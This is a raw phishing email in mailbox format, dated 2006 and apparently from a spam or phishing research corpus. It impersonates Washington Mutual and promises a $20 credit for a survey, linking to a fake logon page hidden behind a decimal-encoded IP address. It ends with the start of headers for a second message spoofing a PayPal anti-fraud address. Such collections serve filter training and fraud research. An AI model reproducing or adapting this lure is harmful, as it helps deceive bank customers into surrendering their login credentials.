From: "WaMu Online" <Support@Wamu.com>
Reply-To: "WaMu Online" <Support@Wamu.com>
To: dros@example.com, nobody@example.com, marius@example.com,
	provos@example.com
Subject: SERVICE: Washington Mutual Online® $20 Reward Survey
Date: Thu, 04 May 2006 05:00:13 +0200
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--12175200611321685"
X-Priority: 1
X-MSMail-Priority: High
Status: 
X-Status: 
X-Keywords:                   

----12175200611321685
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<p>
  <A target=3D"_blank"
href=3D"http://3397460690/online.wamu.com/IdentityManagement/Logon.aspx/" =
   ><IMG
src=3D"https://login.personal.wamu.com/images/wamucom_logo.gif"    border=3D=
0></A></p>
<br>CONGRATULATIONS!
<br>
<br>You have been chosen by the WaMu Online Department to take part in our=
 quick and easy 5 question survey.<br> In return we will credit $20 to you=
r account - Just for your time!<br> Helping us better understand how our c=
ustomers feel benefits everyone.
<br>
With the information collected we can decide to direct a number of changes=
 to improve and expand our online service.
<br>
We kindly ask you to spare two minutes of your time in taking part with th=
is unique offer!<br>
<br>
SERVICE: Washington Mutual Online=AE $20 Reward Survey<br>
<br>
<br>
<a href=3D"http://3397460690/online.wamu.com/IdentityManagement/Logon.aspx=
/">Confirm Now</a> your $20 Reward Survey with Washington Mutual Online=AE=
 Reward services.<br>
<br>The information you provide us is all non-sensitive and anonymous No p=
art of it is handed down to any third party groups.<br> It will be stored =
in our secure database for maximum of 3 days while we process the results =
of this nationwide survey.<br>
<br><p><font size=3D"2" face=3D"Arial, Helvetica, sans-serif"></font><font=

color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif"><BR>
Thank you for your patience in this matter.</font><br>
  <br>
</p>
<p><font color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif=
">Washington Mutual  Customer Service</font><br>
<font color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif"><=
/font></p>
<p><font size=3D"2" face=3D"Arial, Helvetica, sans-serif"><font color=3D"#=
999999" size=3D"1">Please do not reply to this e-mail
as this is only a notification. Mail sent to this address cannot be answer=
ed. </font></font></p>
<p><font color=3D"#000000" size=3D"1" face=3D"Arial, Helvetica, sans-serif=
"><font color=3D"black"><span style=3D"color:
black;">Copyright 2006, Washington Mutual, Inc. All Rights Reserved.
 </font><br>
</html>

----12175200611321685--

From antifraud@paypal.com  Wed May  3 23:29:03 2006
Return-Path: <antifraud@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP
	id 05575CAB566; Wed,  3 May 2006 23:29:03 -0400 (EDT)
Received: from 70.60.31.11 (unknown [70.60.31.11])
	by mail1.example.com (Postfix) with SMTP id C3E626CCEA9;
	Wed,  3 May 2006 18:42:42 -0400 (EDT)
Received: from 188.238.185.251 by ; Wed, 03 May 2006 23:27:55 -0500
Message-ID: <TOXHFRXVEVLKGBRECTEUPD@msn.com>
